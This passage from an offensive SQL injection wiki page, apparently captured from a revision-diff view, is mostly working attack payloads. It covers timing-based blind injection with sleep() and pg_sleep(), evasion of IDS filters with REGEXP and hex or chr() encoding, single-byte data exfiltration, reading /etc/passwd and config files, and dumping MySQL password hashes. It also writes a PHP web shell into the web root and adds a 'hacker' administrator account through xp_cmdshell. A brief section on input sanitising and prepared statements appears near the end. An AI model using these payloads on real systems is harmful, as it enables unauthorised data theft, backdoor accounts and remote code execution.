Notice when injecting that the sleep() function still outputs a false results set, however it takes 15 seconds. It should take the page less than that to load normally. We can use this in conjunction with a timer when automating sql injection. As noted above in the general boolean enumeration section, because we want to evade modern IDS systems, the best option is the REGEXP operator because of its lack of need for quotes,commas, or standard comparison operators (<, =, >) If the input for the id is vulnerable, the best method to exploit sleep() is by using the REGEXP operator in combination with the CAST() function. REGEXP always returns 1 or 0 based on whether or not there was a match. 1 for matching and 0 for no match found. By casting its return to a signed integer and using a multiplication test, we can control its output for combination with the sleep command: mysql> SELECT * FROM sample WHERE id=1 AND sleep(CAST((SELECT 'a' REGEXP '^[n-z]') AS signed) * 15); Empty set (0.00 sec) mysql> SELECT * FROM sample WHERE id=1 AND sleep(CAST((SELECT 'x' REGEXP '^[n-z]') AS signed) * 15); Empty set (15.00 sec)

* Now we have false sleeping for zero seconds and true sleeping for 15 seconds.

Using sleep() to map a table name with regular expressions

Protip: Regular expressions in mysql don't need quotes, it is interchangeable with 0xhex!

mysql> SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0; +------------+ \| TABLE_NAME \| +------------+ \| sample \| +------------+ 1 ROW IN SET (0.00 sec) The first letter of "sample" is s, it isn't between a and m, therefore it won't sleep at all when we test to see if it is: mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST( (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[a-m]') AS signed) * 15)); Empty set (0.00 sec) However, when we test to see if it's between n-z, because s is between n and z the return output from REGEXP is multiplied and becomes 15, which is passed to the sleep() function: mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST( (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[n-z]') AS signed) * 15)); Empty set (15.00 sec) So, an injection URI that utilizes sleep(), cast(), and multiplication can be used remotely in cases of unpredictable output and without the need for quotes, commas, comment notation, or standard comparison operators (<, =, >) to test if the first character of the first table in the database is between a and m would look like: /vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e612d6d) as signed) * 15)); However the n-z would look like: /vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e6e2d7a) as signed) * 15));

PostgreSQL Boolean Timing Attacks

 pg_sleep() is the basis of both single-byte exfiltration and boolean enumeration.

Testing for access to pg_sleep()

You can test for access to pg_sleep() with:

AND pg_sleep(15) IS NULL It should take an additional 15 seconds to load the page.

Using pg_sleep() with alternative comparisons for evasive boolean enumeration

You can use BETWEEN ... AND ... as well as the regular expression operators here.

'Sleeping on true and not sleeping on false:'Similar to mysql, the database will sleep when you select pg_sleep([int]).

Using CASE to control pg_sleep with BETWEEN...AND: AND (CASE WHEN 1 BETWEEN 1 AND 1 THEN pg_sleep(15) ELSE 9 END) IS NULL If the input is vulnerable, the database will sleep for 15 seconds. True statements will sleep, false statements will not sleep. You can use ascii() between similar to standard PostgreSQL Boolean Enumeration here, True Injection: AND (CASE WHEN ascii(SUBSTRING(version(),1,1)) BETWEEN 1 AND 255 THEN pg_sleep(5) ELSE 98923 END) IS NULL False Injection: AND (CASE WHEN ascii(SUBSTRING(version(),1,1)) BETWEEN 1 AND 1 THEN pg_sleep(5) ELSE 23265 END) IS NULL

Using CASE with the ~ regular expression operator and string concatenation:

Notice that like MySQL regular expression attacks, this attack also bypasses the need for several syntax characters.

The following will sleep for 15 seconds if the lowercase format of the version string matches "^[a-z]", the same as the (SELECT chr(94)\|\|chr(91)\|\|chr(97)\|\|chr(45)\|\|chr(122)\|\|chr(93)) *This should always be true, delaying the page load for an additional 15 seconds:* AND (CASE WHEN LOWER(version()) ~ (SELECT chr(94)\|\|chr(91)\|\|chr(97)\|\|chr(45)\|\|chr(122)\|\|chr(93)) THEN pg_sleep(15) ELSE NULL END) IS NULL *This should always be false, as PostgreSQL always capitalizes the first character, meaning no time delay should take place:* AND (CASE WHEN version() ~ (SELECT chr(94)\|\|chr(91)\|\|chr(97)\|\|chr(45)\|\|chr(122)\|\|chr(93)) THEN pg_sleep(15) ELSE NULL END) IS NULL

Expert: Automated Single-byte exfiltration

There are multiple types of single byte exfiltration attacks:

Timing based
Pre-computation based

The only three things that all of these methods have in common is:

These attacks are all limited in some fashion because of local environment and latency or remote environment and dataset.
The target environment must not filter or otherwise restrict the use of commas (,); regular expressions will not work here because injected queries are selecting rather than comparing the value of a single byte.
You must not be afraid of programming.

Timing-based Single-byte Exfiltration

If you're not on a LAN when you utilize this technique, you will get buggy and unpredictable results.

This testing is ideal when:

You're on a relatively low latency network You have a consistent latency and the remote page has a consistent load time (may not vary by more than 0.5 seconds)

Protip: Single byte exfiltration takes less queries to perform the same results, and leaves a smaller log footprint.

You will need to use a timer to see how long it takes the remote server to serve the page.

Examples of timing-based single-byte exfiltration:

Exfiltrating the first character of the database name in a single request:

 
  AND sleep(ascii(SUBSTRING(@@DATABASE,1,1)))                  -- MySQL
  AND pg_sleep(ascii(SUBSTRING(current_database,1,1))) IS NULL -- PostgreSQL

 By timing these (in seconds) we will have the integer value of the ascii code of the first character of the database.

The Comparative Precomputation Attack

This attack relies heavily on the remote dataset for successful exploitation and is thus less reliable than other methods. This significantly differs from previously discovered single-byte exfiltration techniques because:

It is based on precomputation It is not a timing attack

Requirements: The query you are injecting into must have at least 254 rows The precomputation attack is compatible with all database backends.

Precomputation is done for performance reasons. At the very least, a comparative test will be required. The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.

Suppose we had the following query:

$query = "select * from articles where id=$input";

And the following uri:

 /articles.php?id=1

We can test to see if there are 255 articles by visiting:

 /articles.php?id=255 Follow the next steps for automation (and sanity's) sake:

Choose a language supporting something similar to array_flip() for programming your automation tool. Write a loop to download each article In the loop, populate an array (using integer indexes) with checksum hashes as values Flip the array

We're almost done!

We can then visit:

 /articles.php?id=ascii(substr(user(),1,1))

Checksum the output
Now access the checksums array using the checksum of the output as the key:

$ascii_code = $checksums[$output_checksum];

And we've determined the value of a byte.

Protip: You can extend this attack by:

Using arithmetic operators to get sequential id's offset from 0-255 (e.g. /articles.php?id=(select ascii(substr(user(),1,1))+67) Using MySQL field operators and a static query that returns id's to bypass the requirement for the id's to be sequential

Further Penetration

Most demonstrated methods require additional privileges

Obtaining direct database access

Requires a privileged user or valid privilege escalation

There are several methods for obtaining direct database access so that you can log in remotely.

See the Privileged query cheat sheets for queries to directly obtain database credentials using SQL injection
Obtaining authentication credentials from the web application configuration file by accessing the filesystem

SELECT load_file('/path/to/config.php');

After escalating privileges to administrator of the web application using its administrative interface to run queries directly find the authentication credentials in the configuration file with a file editor

Protip: Obtaining authentication credentials from the web application's configuration file using code-execution after privilege escalation

find -name \*conf\*.php -exec grep -iHn "user\|name\|pass\|host" '{}' \;

Obtaining filesystem access

This will require MySQL, depend on the SQL server configuration as well as the OS configuration, the user in context must have the FILE privilege.

load_file()

 Mysql's load_file() function takes a single string literal (it can be bypassed with 0x[hex]) as a filename and 
 returns either the file contents as a single-cell string or null if the query failed for any reason.

select ... into outfile

 into outfile is limited in that it cannot receive a string literal, but must be a constant.

Examples of these are located in our priveleged MySQL cheat sheet.

Obtaining Code Execution

Through the vulnerable web application:

It is possible that the administrative interface will contain template and theme editors and the ability to add/modify/delete PHP or other interpreted languages in the associated files. Knowing this is just one more reason to make a beeline for the user table for the affected web application and get to cracking the authentication credentials for the admin user.

Via database engine (MS SQL-specific)

By ending the query with a semicolon or comment delimiter and beginning a new query, we can get MS SQL to run

;exec master..xp_cmdshell 'net user hacker hacker_password /add'
;exec master..xp_cmdshell 'net localgroup administrators hacker /add'
/url.asp?ArticleID=1;exec master..xp_cmdshell 'net user hacker hackerpassword /add';--
/url.asp?ArticleID=1;exec master..xp_cmdshell 'net localgroup administrators hacker /add';--

Writing a shell to the document root (MySQL-specific)

Cheat Sheets

Vulnerability Testing

Protip: We've compacted the best true and false statements for compatibility and evasion here. If you're having problems, you may need to give our entries on remote testing or defeating sql injection filters a read.

Universal True and False Statements

Notice: We've ensured the accuracy of this stuff. If we're missing any universal testing operators, please let us know.

Standard operators (Universal):

True: AND 230984752 = 230984752 False: AND 1023947182234 = 4382616621386497

The Between ... And ... operators (Universal):

True: AND 238829 BETWEEN 238826 AND 238927 False: AND 328961 BETWEEN 928172 AND 986731

The LIKE operator (Universal):

True: AND 'sqltest' LIKE 'sql%' False: AND 'sqltest' LIKE 'not true'

The REGEXP operator (RLIKE in Microsoft SQL and the "~" character in PostgreSQL, Universal):

True: AND 'sqltest' REGEXP '^sql' False: AND 'sqltest' REGEXP '^false'

MySQL Syntax Reference

Comment notation:

 /*   [*/]
 %23 (# urlencoded) 
 --[space]

Handy functions, statements, and Environment Variables:

  version()
  USER()
  current_database()
  COUNT([column_name]) FROM [TABLE_NAME]
  LENGTH([column_name]) FROM [TABLE_NAME] [WHERE OR LIMIT]
  substr([query],[byte_counter],1) 
  concat([column_name],0x2f,[column_name]) FROM [TABLE_NAME] [WHERE OR LIMIT]
  group_concat([column_name],0x2f,[column_name]) FROM [TABLE_NAME] [WHERE OR LIMIT]

You can evade the need for quotes by using the 0x[hex] operator. An example is "select 0x6a6a". The output is "jj", same as if you were to have run "select 'jj'".

Mysql Versions >= 5 User Schema Mapping (Unprivileged)

Show Databases Equivilent:

SELECT schema_name FROM information_schema.schemata LIMIT 1 offset 0

Show Tables Equivilent

SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0

Show Fields Equivilent

SELECT column_name FROM information_schema.columns WHERE table_schema=DATABASE() AND TABLE_NAME=([TABLE query]) LIMIT 1 offset 0

Privileged Mysql (Any version) User

Get mysql usernames and password hashes:

SELECT concat(USER,0x2f,password) FROM mysql.user LIMIT 1

Grab /etc/passwd

SELECT load_file(0x2f6574632f706173737764)

Dump a small php shell (<?php system($_GET['id']); ?>) into /var/www/localhost/htdocs

SELECT 0x3c3f7068702073797374656d28245f4745545b276964275d293b203f3e INTO OUTFILE '/var/www/localhost/htdocs/.shell.php'

PostgreSQL Syntax Reference

Handy functions & Environment Variables include:

current_database() CURRENT_USER() chr() ascii() substr()

Quick and common string concatenations:

String concatenation in postgresql is done using the two pipe operators side by side, e.g. "select chr(97)||chr(97)" is the same as "select 'aa'".

Congruent to select 'BASE TABLE';:

  (SELECT CHR(66)||CHR(65)||CHR(83)||CHR(69)||CHR(32)||CHR(84)||CHR(65)||CHR(66)||CHR(76)||CHR(69))

Congruent to select 'pg_catalog';:

  (SELECT CHR(112)||CHR(103)||CHR(95)||CHR(99)||CHR(97)||CHR(116)||CHR(97)||CHR(108)||CHR(111)||CHR(103))

Congruent to select 'information_schema';:

  (SELECT CHR(105)||CHR(110)||CHR(102)||CHR(111)||CHR(114)||CHR(109)||CHR(97)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(95)||CHR(115)||CHR(99)||CHR(104)||CHR(101)||CHR(109)||CHR(97))

PostgreSQL Schema Mapping

\dn equivilent:

  SELECT schema_name FROM information_schema.schemata WHERE catalog_name=current_database() LIMIT 1 offset 0

\dt equivilent:

  SELECT TABLE_NAME FROM information_schema.tables table_type='BASE TABLE' AND table_schema=([schema_query]) AND catalog_name=current_database() LIMIT 1 offset 0

\d [table_name] equivilent:

  SELECT column_name FROM information_schema.columns WHERE TABLE_NAME=([table_query]) AND table_schema=(schema_query) AND catalog_name=current_database() LIMIT 1 offset 0

Microsoft SQL Syntax Reference

Handy functions, statements, and Environment Variables:

 database()
 ascii()
 substring()
 WAIT ... FOR DELAY
 @@version

String concatenation is preformed in Microsoft SQL via the + character.

Microsoft SQL Schema Mapping (Unprivileged)

Obtaining the first table:

  SELECT top 1 TABLE_NAME FROM (SELECT top 1 TABLE_NAME FROM information_schema.columns WHERE table_catalog=@@DATABASE GROUP BY TABLE_NAME ORDER BY TABLE_NAME DESC) sq 
    GROUP BY TABLE_NAME ORDER BY TABLE_NAME ASC

Obtaining the first column:

  SELECT top 1 column_name FROM (SELECT top 1 column_name FROM information_schema.columns WHERE table_catalog=@@DATABASE AND TABLE_NAME='[table_name]' 
    GROUP BY column_name ORDER BY column_name ASC) sq GROUP BY column_name ORDER BY column_name DESC

Privileged Microsoft SQL Injection

Command Execution:

;%0a%0dexec master..xp_cmdshell 'net user hacker hackerpassword /add';--
;%0a%0dexec master..xp_cmdshell 'net localgroup administrators hacker /add';--

Obtaining database authentication credentials:

SELECT * FROM sysobjects WHERE type='U'

Patching SQL Injection Vulnerabilities

The security analyst says
"It's pretty straight forward. You either sanitize your inputs properly, or use prepared statements. Obviously, today's countermeasures just don't cut it."

Ruby input sanitizing:

  [Sanitizes For]  | [Type]  |  [Engine]  | [Example]
XSS, SQL Injection | String  | Any        | var = HTMLEntities.encode(var,:basic:)
SQL Injection      | String  | MySQL      | var = Mysql.escape_string(var)
SQL Injection      | String  | PostgreSQL | var = PGconn.escape_string(var)
XSS, SQL Injection | Integer | Any        | var = var.to_i

PHP input sanitizing:

  [Sanitizes For]  | [Type]  |  [Engine]  | [Example]
XSS, SQL Injection | String  | Any        | $var = htmlentities($_GET['var'],ENT_QUOTES);
SQL Injection      | String  | MySQL      | $var = mysql_real_escape_string($_GET['var']);
SQL Injection      | String  | PostgreSQL | $var = pg_escape_string($_GET['var']);
XSS, SQL Injection | Integer | Any        | $var = (int)$_GET['var'];

Python input sanitizing:

Python2.4 and newer defaults to using prepared statements. Thus, this table only refers to legacy applications built in python versions < 2.4 that require manual sanitizing.

[Sanitizes For] | [Type] | [Engine] | [Example]

XSS, SQL Injection | String  | Any        | var = urllib.urlencode(var)
SQL Injection      | String  | MySQL      | var = conn.escape_string(var)
SQL Injection      | String  | PostgreSQL | var = psycopg2.extensions.adapt(var)
XSS, SQL Injection | Integer | Any        | var = int(var)

Protip: Most researchers to date considers the use of prepared statements to be perfectly safe due to the basic differences in query implementations.

Prepared statements typically use a PDO library and use the binary protocol rather than the socket protocol for interacting with the server. A statement must be prepared knowing the number and locations of inputs, then executed using inputs as parameters.

Revision as of 14:02, 7 May 2012 (view source) LashawnSeccombe (Talk \| contribs) (→‎Expert: Timing attacks for automated boolean enumeration) ← Older edit		Revision as of 14:02, 7 May 2012 (view source) LashawnSeccombe (Talk \| contribs) (→‎Expert: Automated Single-byte exfiltration) Newer edit →
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−	== Expert: Automated Single-byte exfiltration ==	+	= Expert: Automated Single-byte exfiltration =

	'''There are multiple types of single byte exfiltration attacks:'''		'''There are multiple types of single byte exfiltration attacks:'''

Difference between revisions of "SQL injection"